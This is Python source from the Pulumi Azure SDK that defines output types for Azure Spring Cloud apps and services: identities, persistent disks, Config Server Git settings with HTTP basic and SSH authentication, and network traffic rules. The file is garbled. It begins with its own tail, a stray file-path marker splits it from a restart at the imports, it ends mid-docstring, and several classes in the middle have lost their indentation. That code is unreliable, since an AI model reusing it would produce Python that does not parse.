    @property
    @pulumi.getter
    def type(self) -> str:
        """The Type of Managed Identity assigned to the Spring Cloud Application."""
        return pulumi.get(self, "type")
@pulumi.output_type
class GetSpringCloudAppPersistentDiskResult(dict):
    """Data-source result describing the persistent disk of a Spring Cloud Application."""

    def __init__(__self__, *,
                 mount_path: str,
                 size_in_gb: int):
        """
        :param str mount_path: The mount path of the persistent disk.
        :param int size_in_gb: The size of the persistent disk in GB.
        """
        pulumi.set(__self__, "mount_path", mount_path)
        pulumi.set(__self__, "size_in_gb", size_in_gb)

    @property
    @pulumi.getter(name="mountPath")
    def mount_path(self) -> str:
        """The mount path of the persistent disk."""
        return pulumi.get(self, "mount_path")

    @property
    @pulumi.getter(name="sizeInGb")
    def size_in_gb(self) -> int:
        """The size of the persistent disk in GB."""
        return pulumi.get(self, "size_in_gb")
@pulumi.output_type
class GetSpringCloudServiceConfigServerGitSettingResult(dict):
    """Data-source result describing the Git-backed Config Server settings of a Spring Cloud Service."""

    def __init__(__self__, *,
                 http_basic_auths: Sequence['outputs.GetSpringCloudServiceConfigServerGitSettingHttpBasicAuthResult'],
                 label: str,
                 repositories: Sequence['outputs.GetSpringCloudServiceConfigServerGitSettingRepositoryResult'],
                 search_paths: Sequence[str],
                 ssh_auths: Sequence['outputs.GetSpringCloudServiceConfigServerGitSettingSshAuthResult'],
                 uri: str):
        """
        :param Sequence['GetSpringCloudServiceConfigServerGitSettingHttpBasicAuthArgs'] http_basic_auths: A `http_basic_auth` block as defined below.
        :param str label: The default label of the Git repository, which is a branch name, tag name, or commit-id of the repository
        :param Sequence['GetSpringCloudServiceConfigServerGitSettingRepositoryArgs'] repositories: One or more `repository` blocks as defined below.
        :param Sequence[str] search_paths: An array of strings used to search subdirectories of the Git repository.
        :param Sequence['GetSpringCloudServiceConfigServerGitSettingSshAuthArgs'] ssh_auths: A `ssh_auth` block as defined below.
        :param str uri: The URI of the Git repository
        """
        # All fields are required in the data-source result.
        for _key, _value in (("http_basic_auths", http_basic_auths),
                             ("label", label),
                             ("repositories", repositories),
                             ("search_paths", search_paths),
                             ("ssh_auths", ssh_auths),
                             ("uri", uri)):
            pulumi.set(__self__, _key, _value)

    @property
    @pulumi.getter(name="httpBasicAuths")
    def http_basic_auths(self) -> Sequence['outputs.GetSpringCloudServiceConfigServerGitSettingHttpBasicAuthResult']:
        """A `http_basic_auth` block as defined below."""
        return pulumi.get(self, "http_basic_auths")

    @property
    @pulumi.getter
    def label(self) -> str:
        """The default label of the Git repository, which is a branch name, tag name, or commit-id of the repository"""
        return pulumi.get(self, "label")

    @property
    @pulumi.getter
    def repositories(self) -> Sequence['outputs.GetSpringCloudServiceConfigServerGitSettingRepositoryResult']:
        """One or more `repository` blocks as defined below."""
        return pulumi.get(self, "repositories")

    @property
    @pulumi.getter(name="searchPaths")
    def search_paths(self) -> Sequence[str]:
        """An array of strings used to search subdirectories of the Git repository."""
        return pulumi.get(self, "search_paths")

    @property
    @pulumi.getter(name="sshAuths")
    def ssh_auths(self) -> Sequence['outputs.GetSpringCloudServiceConfigServerGitSettingSshAuthResult']:
        """A `ssh_auth` block as defined below."""
        return pulumi.get(self, "ssh_auths")

    @property
    @pulumi.getter
    def uri(self) -> str:
        """The URI of the Git repository"""
        return pulumi.get(self, "uri")
@pulumi.output_type
class GetSpringCloudServiceConfigServerGitSettingHttpBasicAuthResult(dict):
def __init__(__self__, *,
password: str,
username: str):
"""
:param str password: The password used to access the Http Basic Authentication Git repository server.
:param str username: The username used to access the Http Basic Authentication Git repository server.
"""
pulumi.set(__self__, "password", password)
pulumi.set(__self__, "username", username)
@property
@pulumi.getter
def password(self) -> str:
"""
The password used to access the Http Basic Authentication Git repository server.
"""
return pulumi.get(self, "password")
@property
@pulumi.getter
def username(self) -> str:
"""
The username used to access the Http Basic Authentication Git repository server.
"""
return pulumi.get(self, "username")
@pulumi.output_type
class GetSpringCloudServiceConfigServerGitSettingRepositoryResult(dict):
def __init__(__self__, *,
http_basic_auths: Sequence['outputs.GetSpringCloudServiceConfigServerGitSettingRepositoryHttpBasicAuthResult'],
label: str,
name: str,
patterns: Sequence[str],
search_paths: Sequence[str],
ssh_auths: Sequence['outputs.GetSpringCloudServiceConfigServerGitSettingRepositorySshAuthResult'],
uri: str):
"""
:param Sequence['GetSpringCloudServiceConfigServerGitSettingRepositoryHttpBasicAuthArgs'] http_basic_auths: A `http_basic_auth` block as defined below.
:param str label: The default label of the Git repository, which is a branch name, tag name, or commit-id of the repository
:param str name: Specifies The name of the Spring Cloud Service resource.
:param Sequence[str] patterns: An array of strings used to match an application name. For each pattern, use the `{application}/{profile}` format with wildcards.
:param Sequence[str] search_paths: An array of strings used to search subdirectories of the Git repository.
:param Sequence['GetSpringCloudServiceConfigServerGitSettingRepositorySshAuthArgs'] ssh_auths: A `ssh_auth` block as defined below.
:param str uri: The URI of the Git repository
"""
pulumi.set(__self__, "http_basic_auths", http_basic_auths)
pulumi.set(__self__, "label", label)
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "patterns", patterns)
pulumi.set(__self__, "search_paths", search_paths)
pulumi.set(__self__, "ssh_auths", ssh_auths)
pulumi.set(__self__, "uri", uri)
@property
@pulumi.getter(name="httpBasicAuths")
def http_basic_auths(self) -> Sequence['outputs.GetSpringCloudServiceConfigServerGitSettingRepositoryHttpBasicAuthResult']:
"""
A `http_basic_auth` block as defined below.
"""
return pulumi.get(self, "http_basic_auths")
@property
@pulumi.getter
def label(self) -> str:
"""
The default label of the Git repository, which is a branch name, tag name, or commit-id of the repository
"""
return pulumi.get(self, "label")
@property
@pulumi.getter
def name(self) -> str:
"""
Specifies The name of the Spring Cloud Service resource.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def patterns(self) -> Sequence[str]:
"""
An array of strings used to match an application name. For each pattern, use the `{application}/{profile}` format with wildcards.
"""
return pulumi.get(self, "patterns")
@property
@pulumi.getter(name="searchPaths")
def search_paths(self) -> Sequence[str]:
"""
An array of strings used to search subdirectories of the Git repository.
"""
return pulumi.get(self, "search_paths")
@property
@pulumi.getter(name="sshAuths")
def ssh_auths(self) -> Sequence['outputs.GetSpringCloudServiceConfigServerGitSettingRepositorySshAuthResult']:
"""
A `ssh_auth` block as defined below.
"""
return pulumi.get(self, "ssh_auths")
@property
@pulumi.getter
def uri(self) -> str:
"""
The URI of the Git repository
"""
return pulumi.get(self, "uri")
@pulumi.output_type
class GetSpringCloudServiceConfigServerGitSettingRepositoryHttpBasicAuthResult(dict):
def __init__(__self__, *,
password: str,
username: str):
"""
:param str password: The password used to access the Http Basic Authentication Git repository server.
:param str username: The username used to access the Http Basic Authentication Git repository server.
"""
pulumi.set(__self__, "password", password)
pulumi.set(__self__, "username", username)
@property
@pulumi.getter
def password(self) -> str:
"""
The password used to access the Http Basic Authentication Git repository server.
"""
return pulumi.get(self, "password")
@property
@pulumi.getter
def username(self) -> str:
"""
The username used to access the Http Basic Authentication Git repository server.
"""
return pulumi.get(self, "username")
@pulumi.output_type
class GetSpringCloudServiceConfigServerGitSettingRepositorySshAuthResult(dict):
def __init__(__self__, *,
host_key: str,
host_key_algorithm: str,
private_key: str,
strict_host_key_checking_enabled: bool):
"""
:param str host_key: The host key of the Git repository server.
:param str host_key_algorithm: The host key algorithm.
:param str private_key: The SSH private key to access the Git repository, needed when the URI starts with `git@` or `ssh://`.
:param bool strict_host_key_checking_enabled: Indicates whether the Config Server instance will fail to start if the host_key does not match.
"""
pulumi.set(__self__, "host_key", host_key)
pulumi.set(__self__, "host_key_algorithm", host_key_algorithm)
pulumi.set(__self__, "private_key", private_key)
pulumi.set(__self__, "strict_host_key_checking_enabled", strict_host_key_checking_enabled)
@property
@pulumi.getter(name="hostKey")
def host_key(self) -> str:
"""
The host key of the Git repository server.
"""
return pulumi.get(self, "host_key")
@property
@pulumi.getter(name="hostKeyAlgorithm")
def host_key_algorithm(self) -> str:
"""
The host key algorithm.
"""
return pulumi.get(self, "host_key_algorithm")
@property
@pulumi.getter(name="privateKey")
def private_key(self) -> str:
"""
The SSH private key to access the Git repository, needed when the URI starts with `git@` or `ssh://`.
"""
return pulumi.get(self, "private_key")
@property
@pulumi.getter(name="strictHostKeyCheckingEnabled")
def strict_host_key_checking_enabled(self) -> bool:
"""
Indicates whether the Config Server instance will fail to start if the host_key does not match.
"""
return pulumi.get(self, "strict_host_key_checking_enabled")
@pulumi.output_type
class GetSpringCloudServiceConfigServerGitSettingSshAuthResult(dict):
def __init__(__self__, *,
host_key: str,
host_key_algorithm: str,
private_key: str,
strict_host_key_checking_enabled: bool):
"""
:param str host_key: The host key of the Git repository server.
:param str host_key_algorithm: The host key algorithm.
:param str private_key: The SSH private key to access the Git repository, needed when the URI starts with `git@` or `ssh://`.
:param bool strict_host_key_checking_enabled: Indicates whether the Config Server instance will fail to start if the host_key does not match.
"""
pulumi.set(__self__, "host_key", host_key)
pulumi.set(__self__, "host_key_algorithm", host_key_algorithm)
pulumi.set(__self__, "private_key", private_key)
pulumi.set(__self__, "strict_host_key_checking_enabled", strict_host_key_checking_enabled)
@property
@pulumi.getter(name="hostKey")
def host_key(self) -> str:
"""
The host key of the Git repository server.
"""
return pulumi.get(self, "host_key")
@property
@pulumi.getter(name="hostKeyAlgorithm")
def host_key_algorithm(self) -> str:
"""
The host key algorithm.
"""
return pulumi.get(self, "host_key_algorithm")
@property
@pulumi.getter(name="privateKey")
def private_key(self) -> str:
"""
The SSH private key to access the Git repository, needed when the URI starts with `git@` or `ssh://`.
"""
return pulumi.get(self, "private_key")
@property
@pulumi.getter(name="strictHostKeyCheckingEnabled")
def strict_host_key_checking_enabled(self) -> bool:
"""
Indicates whether the Config Server instance will fail to start if the host_key does not match.
"""
return pulumi.get(self, "strict_host_key_checking_enabled")
@pulumi.output_type
class GetSpringCloudServiceRequiredNetworkTrafficRuleResult(dict):
def __init__(__self__, *,
direction: str,
fqdns: Sequence[str],
ip_addresses: Sequence[str],
port: int,
protocol: str):
"""
:param str direction: The direction of required traffic. Possible values are `Inbound`, `Outbound`.
:param Sequence[str] fqdns: The FQDN list of required traffic.
:param int port: The port of required traffic.
:param str protocol: The protocol of required traffic.
"""
pulumi.set(__self__, "direction", direction)
pulumi.set(__self__, "fqdns", fqdns)
pulumi.set(__self__, "ip_addresses", ip_addresses)
pulumi.set(__self__, "port", port)
pulumi.set(__self__, "protocol", protocol)
@property
@pulumi.getter
def direction(self) -> str:
"""
The direction of required traffic. Possible values are `Inbound`, `Outbound`.
"""
return pulumi.get(self, "direction")
@property
@pulumi.getter
def fqdns(self) -> Sequence[str]:
"""
The FQDN list of required traffic.
"""
return pulumi.get(self, "fqdns")
@property
@pulumi.getter(name="ipAddresses")
def ip_addresses(self) -> Sequence[str]:
return pulumi.get(self, "ip_addresses")
@property
@pulumi.getter
def port(self) -> int:
"""
The port of required traffic.
"""
return pulumi.get(self, "port")
@property
@pulumi.getter
def protocol(self) -> str:
"""
The protocol of required traffic.
"""
return pulumi.get(self, "protocol") | sdk/python/pulumi_azure/appplatform/outputs.py |
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
# Public API of this module: resource output types first, then the
# data-source (`Get*Result`) variants returned by lookup functions.
__all__ = [
    'SpringCloudAppIdentity',
    'SpringCloudAppPersistentDisk',
    'SpringCloudServiceConfigServerGitSetting',
    'SpringCloudServiceConfigServerGitSettingHttpBasicAuth',
    'SpringCloudServiceConfigServerGitSettingRepository',
    'SpringCloudServiceConfigServerGitSettingRepositoryHttpBasicAuth',
    'SpringCloudServiceConfigServerGitSettingRepositorySshAuth',
    'SpringCloudServiceConfigServerGitSettingSshAuth',
    'SpringCloudServiceNetwork',
    'SpringCloudServiceRequiredNetworkTrafficRule',
    'SpringCloudServiceTrace',
    'GetSpringCloudAppIdentityResult',
    'GetSpringCloudAppPersistentDiskResult',
    'GetSpringCloudServiceConfigServerGitSettingResult',
    'GetSpringCloudServiceConfigServerGitSettingHttpBasicAuthResult',
    'GetSpringCloudServiceConfigServerGitSettingRepositoryResult',
    'GetSpringCloudServiceConfigServerGitSettingRepositoryHttpBasicAuthResult',
    'GetSpringCloudServiceConfigServerGitSettingRepositorySshAuthResult',
    'GetSpringCloudServiceConfigServerGitSettingSshAuthResult',
    'GetSpringCloudServiceRequiredNetworkTrafficRuleResult',
]
@pulumi.output_type
class SpringCloudAppIdentity(dict):
    """Managed Service Identity attached to a Spring Cloud Application."""

    @staticmethod
    def __key_warning(key: str):
        # Legacy camelCase dict keys mapped to the snake_case property
        # that callers should use instead; warn on deprecated access.
        suggest = {
            "principalId": "principal_id",
            "tenantId": "tenant_id",
        }.get(key)
        if suggest:
            pulumi.log.warn(f"Key '{key}' not found in SpringCloudAppIdentity. Access the value via the '{suggest}' property getter instead.")

    def __getitem__(self, key: str) -> Any:
        SpringCloudAppIdentity.__key_warning(key)
        return super().__getitem__(key)

    def get(self, key: str, default = None) -> Any:
        SpringCloudAppIdentity.__key_warning(key)
        return super().get(key, default)

    def __init__(__self__, *,
                 principal_id: Optional[str] = None,
                 tenant_id: Optional[str] = None,
                 type: Optional[str] = None):
        """
        :param str principal_id: The Principal ID for the Service Principal associated with the Managed Service Identity of this Spring Cloud Application.
        :param str tenant_id: The Tenant ID for the Service Principal associated with the Managed Service Identity of this Spring Cloud Application.
        :param str type: Specifies the identity type of the Spring Cloud Application. Possible value is `SystemAssigned`.
        """
        # Store only the attributes that were actually supplied, in
        # declaration order.
        for attr, value in (("principal_id", principal_id),
                            ("tenant_id", tenant_id),
                            ("type", type)):
            if value is not None:
                pulumi.set(__self__, attr, value)

    @property
    @pulumi.getter(name="principalId")
    def principal_id(self) -> Optional[str]:
        """
        The Principal ID for the Service Principal associated with the Managed Service Identity of this Spring Cloud Application.
        """
        return pulumi.get(self, "principal_id")

    @property
    @pulumi.getter(name="tenantId")
    def tenant_id(self) -> Optional[str]:
        """
        The Tenant ID for the Service Principal associated with the Managed Service Identity of this Spring Cloud Application.
        """
        return pulumi.get(self, "tenant_id")

    @property
    @pulumi.getter
    def type(self) -> Optional[str]:
        """
        Specifies the identity type of the Spring Cloud Application. Possible value is `SystemAssigned`.
        """
        return pulumi.get(self, "type")
@pulumi.output_type
class SpringCloudAppPersistentDisk(dict):
    """Persistent disk settings of a Spring Cloud Application."""

    @staticmethod
    def __key_warning(key: str):
        # Legacy camelCase dict keys mapped to the snake_case property
        # that callers should use instead; warn on deprecated access.
        suggest = {
            "sizeInGb": "size_in_gb",
            "mountPath": "mount_path",
        }.get(key)
        if suggest:
            pulumi.log.warn(f"Key '{key}' not found in SpringCloudAppPersistentDisk. Access the value via the '{suggest}' property getter instead.")

    def __getitem__(self, key: str) -> Any:
        SpringCloudAppPersistentDisk.__key_warning(key)
        return super().__getitem__(key)

    def get(self, key: str, default = None) -> Any:
        SpringCloudAppPersistentDisk.__key_warning(key)
        return super().get(key, default)

    def __init__(__self__, *,
                 size_in_gb: int,
                 mount_path: Optional[str] = None):
        """
        :param int size_in_gb: Specifies the size of the persistent disk in GB. Possible values are between `0` and `50`.
        :param str mount_path: Specifies the mount path of the persistent disk. Defaults to `/persistent`.
        """
        # The disk size is mandatory; the mount path is stored only when
        # explicitly provided.
        pulumi.set(__self__, "size_in_gb", size_in_gb)
        if mount_path is not None:
            pulumi.set(__self__, "mount_path", mount_path)

    @property
    @pulumi.getter(name="sizeInGb")
    def size_in_gb(self) -> int:
        """
        Specifies the size of the persistent disk in GB. Possible values are between `0` and `50`.
        """
        return pulumi.get(self, "size_in_gb")

    @property
    @pulumi.getter(name="mountPath")
    def mount_path(self) -> Optional[str]:
        """
        Specifies the mount path of the persistent disk. Defaults to `/persistent`.
        """
        return pulumi.get(self, "mount_path")
@pulumi.output_type
class SpringCloudServiceConfigServerGitSetting(dict):
    """Git-backed Config Server settings of a Spring Cloud Service."""

    @staticmethod
    def __key_warning(key: str):
        # Legacy camelCase dict keys mapped to the snake_case property
        # that callers should use instead; warn on deprecated access.
        suggest = {
            "httpBasicAuth": "http_basic_auth",
            "searchPaths": "search_paths",
            "sshAuth": "ssh_auth",
        }.get(key)
        if suggest:
            pulumi.log.warn(f"Key '{key}' not found in SpringCloudServiceConfigServerGitSetting. Access the value via the '{suggest}' property getter instead.")

    def __getitem__(self, key: str) -> Any:
        SpringCloudServiceConfigServerGitSetting.__key_warning(key)
        return super().__getitem__(key)

    def get(self, key: str, default = None) -> Any:
        SpringCloudServiceConfigServerGitSetting.__key_warning(key)
        return super().get(key, default)

    def __init__(__self__, *,
                 uri: str,
                 http_basic_auth: Optional['outputs.SpringCloudServiceConfigServerGitSettingHttpBasicAuth'] = None,
                 label: Optional[str] = None,
                 repositories: Optional[Sequence['outputs.SpringCloudServiceConfigServerGitSettingRepository']] = None,
                 search_paths: Optional[Sequence[str]] = None,
                 ssh_auth: Optional['outputs.SpringCloudServiceConfigServerGitSettingSshAuth'] = None):
        """
        :param str uri: The URI of the default Git repository used as the Config Server back end, should be started with `http://`, `https://`, `git@`, or `ssh://`.
        :param 'SpringCloudServiceConfigServerGitSettingHttpBasicAuthArgs' http_basic_auth: A `http_basic_auth` block as defined below.
        :param str label: The default label of the Git repository, should be the branch name, tag name, or commit-id of the repository.
        :param Sequence['SpringCloudServiceConfigServerGitSettingRepositoryArgs'] repositories: One or more `repository` blocks as defined below.
        :param Sequence[str] search_paths: An array of strings used to search subdirectories of the Git repository.
        :param 'SpringCloudServiceConfigServerGitSettingSshAuthArgs' ssh_auth: A `ssh_auth` block as defined below.
        """
        # The URI is mandatory; every other attribute is stored only when
        # explicitly provided, preserving declaration order.
        pulumi.set(__self__, "uri", uri)
        for attr, value in (("http_basic_auth", http_basic_auth),
                            ("label", label),
                            ("repositories", repositories),
                            ("search_paths", search_paths),
                            ("ssh_auth", ssh_auth)):
            if value is not None:
                pulumi.set(__self__, attr, value)

    @property
    @pulumi.getter
    def uri(self) -> str:
        """
        The URI of the default Git repository used as the Config Server back end, should be started with `http://`, `https://`, `git@`, or `ssh://`.
        """
        return pulumi.get(self, "uri")

    @property
    @pulumi.getter(name="httpBasicAuth")
    def http_basic_auth(self) -> Optional['outputs.SpringCloudServiceConfigServerGitSettingHttpBasicAuth']:
        """
        A `http_basic_auth` block as defined below.
        """
        return pulumi.get(self, "http_basic_auth")

    @property
    @pulumi.getter
    def label(self) -> Optional[str]:
        """
        The default label of the Git repository, should be the branch name, tag name, or commit-id of the repository.
        """
        return pulumi.get(self, "label")

    @property
    @pulumi.getter
    def repositories(self) -> Optional[Sequence['outputs.SpringCloudServiceConfigServerGitSettingRepository']]:
        """
        One or more `repository` blocks as defined below.
        """
        return pulumi.get(self, "repositories")

    @property
    @pulumi.getter(name="searchPaths")
    def search_paths(self) -> Optional[Sequence[str]]:
        """
        An array of strings used to search subdirectories of the Git repository.
        """
        return pulumi.get(self, "search_paths")

    @property
    @pulumi.getter(name="sshAuth")
    def ssh_auth(self) -> Optional['outputs.SpringCloudServiceConfigServerGitSettingSshAuth']:
        """
        A `ssh_auth` block as defined below.
        """
        return pulumi.get(self, "ssh_auth")
@pulumi.output_type
class SpringCloudServiceConfigServerGitSettingHttpBasicAuth(dict):
    """HTTP Basic Authentication credentials for the default Config Server Git repository."""

    def __init__(__self__, *,
                 password: str,
                 username: str):
        """
        :param str password: The password used to access the Git repository server, required when the Git repository server supports Http Basic Authentication.
        :param str username: The username that's used to access the Git repository server, required when the Git repository server supports Http Basic Authentication.
        """
        # Both credentials are required; store them in declaration order.
        for attr, value in (("password", password), ("username", username)):
            pulumi.set(__self__, attr, value)

    @property
    @pulumi.getter
    def password(self) -> str:
        """
        The password used to access the Git repository server, required when the Git repository server supports Http Basic Authentication.
        """
        return pulumi.get(self, "password")

    @property
    @pulumi.getter
    def username(self) -> str:
        """
        The username that's used to access the Git repository server, required when the Git repository server supports Http Basic Authentication.
        """
        return pulumi.get(self, "username")
@pulumi.output_type
class SpringCloudServiceConfigServerGitSettingRepository(dict):
    """An additional, pattern-matched Git repository for the Config Server."""

    @staticmethod
    def __key_warning(key: str):
        # Legacy camelCase dict keys mapped to the snake_case property
        # that callers should use instead; warn on deprecated access.
        suggest = {
            "httpBasicAuth": "http_basic_auth",
            "searchPaths": "search_paths",
            "sshAuth": "ssh_auth",
        }.get(key)
        if suggest:
            pulumi.log.warn(f"Key '{key}' not found in SpringCloudServiceConfigServerGitSettingRepository. Access the value via the '{suggest}' property getter instead.")

    def __getitem__(self, key: str) -> Any:
        SpringCloudServiceConfigServerGitSettingRepository.__key_warning(key)
        return super().__getitem__(key)

    def get(self, key: str, default = None) -> Any:
        SpringCloudServiceConfigServerGitSettingRepository.__key_warning(key)
        return super().get(key, default)

    def __init__(__self__, *,
                 name: str,
                 uri: str,
                 http_basic_auth: Optional['outputs.SpringCloudServiceConfigServerGitSettingRepositoryHttpBasicAuth'] = None,
                 label: Optional[str] = None,
                 patterns: Optional[Sequence[str]] = None,
                 search_paths: Optional[Sequence[str]] = None,
                 ssh_auth: Optional['outputs.SpringCloudServiceConfigServerGitSettingRepositorySshAuth'] = None):
        """
        :param str name: A name to identify on the Git repository, required only if repos exists.
        :param str uri: The URI of the Git repository that's used as the Config Server back end should be started with `http://`, `https://`, `git@`, or `ssh://`.
        :param 'SpringCloudServiceConfigServerGitSettingRepositoryHttpBasicAuthArgs' http_basic_auth: A `http_basic_auth` block as defined below.
        :param str label: The default label of the Git repository, should be the branch name, tag name, or commit-id of the repository.
        :param Sequence[str] patterns: An array of strings used to match an application name. For each pattern, use the `{application}/{profile}` format with wildcards.
        :param Sequence[str] search_paths: An array of strings used to search subdirectories of the Git repository.
        :param 'SpringCloudServiceConfigServerGitSettingRepositorySshAuthArgs' ssh_auth: A `ssh_auth` block as defined below.
        """
        # Required attributes first, then optionals only when explicitly
        # provided, preserving declaration order.
        pulumi.set(__self__, "name", name)
        pulumi.set(__self__, "uri", uri)
        for attr, value in (("http_basic_auth", http_basic_auth),
                            ("label", label),
                            ("patterns", patterns),
                            ("search_paths", search_paths),
                            ("ssh_auth", ssh_auth)):
            if value is not None:
                pulumi.set(__self__, attr, value)

    @property
    @pulumi.getter
    def name(self) -> str:
        """
        A name to identify on the Git repository, required only if repos exists.
        """
        return pulumi.get(self, "name")

    @property
    @pulumi.getter
    def uri(self) -> str:
        """
        The URI of the Git repository that's used as the Config Server back end should be started with `http://`, `https://`, `git@`, or `ssh://`.
        """
        return pulumi.get(self, "uri")

    @property
    @pulumi.getter(name="httpBasicAuth")
    def http_basic_auth(self) -> Optional['outputs.SpringCloudServiceConfigServerGitSettingRepositoryHttpBasicAuth']:
        """
        A `http_basic_auth` block as defined below.
        """
        return pulumi.get(self, "http_basic_auth")

    @property
    @pulumi.getter
    def label(self) -> Optional[str]:
        """
        The default label of the Git repository, should be the branch name, tag name, or commit-id of the repository.
        """
        return pulumi.get(self, "label")

    @property
    @pulumi.getter
    def patterns(self) -> Optional[Sequence[str]]:
        """
        An array of strings used to match an application name. For each pattern, use the `{application}/{profile}` format with wildcards.
        """
        return pulumi.get(self, "patterns")

    @property
    @pulumi.getter(name="searchPaths")
    def search_paths(self) -> Optional[Sequence[str]]:
        """
        An array of strings used to search subdirectories of the Git repository.
        """
        return pulumi.get(self, "search_paths")

    @property
    @pulumi.getter(name="sshAuth")
    def ssh_auth(self) -> Optional['outputs.SpringCloudServiceConfigServerGitSettingRepositorySshAuth']:
        """
        A `ssh_auth` block as defined below.
        """
        return pulumi.get(self, "ssh_auth")
@pulumi.output_type
class SpringCloudServiceConfigServerGitSettingRepositoryHttpBasicAuth(dict):
    """HTTP Basic Authentication credentials for an additional Config Server Git repository."""

    def __init__(__self__, *,
                 password: str,
                 username: str):
        """
        :param str password: The password used to access the Git repository server, required when the Git repository server supports Http Basic Authentication.
        :param str username: The username that's used to access the Git repository server, required when the Git repository server supports Http Basic Authentication.
        """
        # Both credentials are required; store them in declaration order.
        for attr, value in (("password", password), ("username", username)):
            pulumi.set(__self__, attr, value)

    @property
    @pulumi.getter
    def password(self) -> str:
        """
        The password used to access the Git repository server, required when the Git repository server supports Http Basic Authentication.
        """
        return pulumi.get(self, "password")

    @property
    @pulumi.getter
    def username(self) -> str:
        """
        The username that's used to access the Git repository server, required when the Git repository server supports Http Basic Authentication.
        """
        return pulumi.get(self, "username")
@pulumi.output_type
class SpringCloudServiceConfigServerGitSettingRepositorySshAuth(dict):
    """SSH authentication settings for an additional Config Server Git repository."""

    @staticmethod
    def __key_warning(key: str):
        # Legacy camelCase dict keys mapped to the snake_case property
        # that callers should use instead; warn on deprecated access.
        suggest = {
            "privateKey": "private_key",
            "hostKey": "host_key",
            "hostKeyAlgorithm": "host_key_algorithm",
            "strictHostKeyCheckingEnabled": "strict_host_key_checking_enabled",
        }.get(key)
        if suggest:
            pulumi.log.warn(f"Key '{key}' not found in SpringCloudServiceConfigServerGitSettingRepositorySshAuth. Access the value via the '{suggest}' property getter instead.")

    def __getitem__(self, key: str) -> Any:
        SpringCloudServiceConfigServerGitSettingRepositorySshAuth.__key_warning(key)
        return super().__getitem__(key)

    def get(self, key: str, default = None) -> Any:
        SpringCloudServiceConfigServerGitSettingRepositorySshAuth.__key_warning(key)
        return super().get(key, default)

    def __init__(__self__, *,
                 private_key: str,
                 host_key: Optional[str] = None,
                 host_key_algorithm: Optional[str] = None,
                 strict_host_key_checking_enabled: Optional[bool] = None):
        """
        :param str private_key: The SSH private key to access the Git repository, required when the URI starts with `git@` or `ssh://`.
        :param str host_key: The host key of the Git repository server, should not include the algorithm prefix as covered by `host-key-algorithm`.
        :param str host_key_algorithm: The host key algorithm, should be `ssh-dss`, `ssh-rsa`, `ecdsa-sha2-nistp256`, `ecdsa-sha2-nistp384`, or `ecdsa-sha2-nistp521`. Required only if `host-key` exists.
        :param bool strict_host_key_checking_enabled: Indicates whether the Config Server instance will fail to start if the host_key does not match.
        """
        # The private key is mandatory; the remaining attributes are stored
        # only when explicitly provided, preserving declaration order.
        pulumi.set(__self__, "private_key", private_key)
        for attr, value in (("host_key", host_key),
                            ("host_key_algorithm", host_key_algorithm),
                            ("strict_host_key_checking_enabled", strict_host_key_checking_enabled)):
            if value is not None:
                pulumi.set(__self__, attr, value)

    @property
    @pulumi.getter(name="privateKey")
    def private_key(self) -> str:
        """
        The SSH private key to access the Git repository, required when the URI starts with `git@` or `ssh://`.
        """
        return pulumi.get(self, "private_key")

    @property
    @pulumi.getter(name="hostKey")
    def host_key(self) -> Optional[str]:
        """
        The host key of the Git repository server, should not include the algorithm prefix as covered by `host-key-algorithm`.
        """
        return pulumi.get(self, "host_key")

    @property
    @pulumi.getter(name="hostKeyAlgorithm")
    def host_key_algorithm(self) -> Optional[str]:
        """
        The host key algorithm, should be `ssh-dss`, `ssh-rsa`, `ecdsa-sha2-nistp256`, `ecdsa-sha2-nistp384`, or `ecdsa-sha2-nistp521`. Required only if `host-key` exists.
        """
        return pulumi.get(self, "host_key_algorithm")

    @property
    @pulumi.getter(name="strictHostKeyCheckingEnabled")
    def strict_host_key_checking_enabled(self) -> Optional[bool]:
        """
        Indicates whether the Config Server instance will fail to start if the host_key does not match.
        """
        return pulumi.get(self, "strict_host_key_checking_enabled")
@pulumi.output_type
class SpringCloudServiceConfigServerGitSettingSshAuth(dict):
    """SSH authentication settings for the default Config Server Git repository."""

    @staticmethod
    def __key_warning(key: str):
        # Legacy camelCase dict keys mapped to the snake_case property
        # that callers should use instead; warn on deprecated access.
        suggest = {
            "privateKey": "private_key",
            "hostKey": "host_key",
            "hostKeyAlgorithm": "host_key_algorithm",
            "strictHostKeyCheckingEnabled": "strict_host_key_checking_enabled",
        }.get(key)
        if suggest:
            pulumi.log.warn(f"Key '{key}' not found in SpringCloudServiceConfigServerGitSettingSshAuth. Access the value via the '{suggest}' property getter instead.")

    def __getitem__(self, key: str) -> Any:
        SpringCloudServiceConfigServerGitSettingSshAuth.__key_warning(key)
        return super().__getitem__(key)

    def get(self, key: str, default = None) -> Any:
        SpringCloudServiceConfigServerGitSettingSshAuth.__key_warning(key)
        return super().get(key, default)

    def __init__(__self__, *,
                 private_key: str,
                 host_key: Optional[str] = None,
                 host_key_algorithm: Optional[str] = None,
                 strict_host_key_checking_enabled: Optional[bool] = None):
        """
        :param str private_key: The SSH private key to access the Git repository, required when the URI starts with `git@` or `ssh://`.
        :param str host_key: The host key of the Git repository server, should not include the algorithm prefix as covered by `host-key-algorithm`.
        :param str host_key_algorithm: The host key algorithm, should be `ssh-dss`, `ssh-rsa`, `ecdsa-sha2-nistp256`, `ecdsa-sha2-nistp384`, or `ecdsa-sha2-nistp521`. Required only if `host-key` exists.
        :param bool strict_host_key_checking_enabled: Indicates whether the Config Server instance will fail to start if the host_key does not match.
        """
        # The private key is mandatory; the remaining attributes are stored
        # only when explicitly provided, preserving declaration order.
        pulumi.set(__self__, "private_key", private_key)
        for attr, value in (("host_key", host_key),
                            ("host_key_algorithm", host_key_algorithm),
                            ("strict_host_key_checking_enabled", strict_host_key_checking_enabled)):
            if value is not None:
                pulumi.set(__self__, attr, value)

    @property
    @pulumi.getter(name="privateKey")
    def private_key(self) -> str:
        """
        The SSH private key to access the Git repository, required when the URI starts with `git@` or `ssh://`.
        """
        return pulumi.get(self, "private_key")

    @property
    @pulumi.getter(name="hostKey")
    def host_key(self) -> Optional[str]:
        """
        The host key of the Git repository server, should not include the algorithm prefix as covered by `host-key-algorithm`.
        """
        return pulumi.get(self, "host_key")

    @property
    @pulumi.getter(name="hostKeyAlgorithm")
    def host_key_algorithm(self) -> Optional[str]:
        """
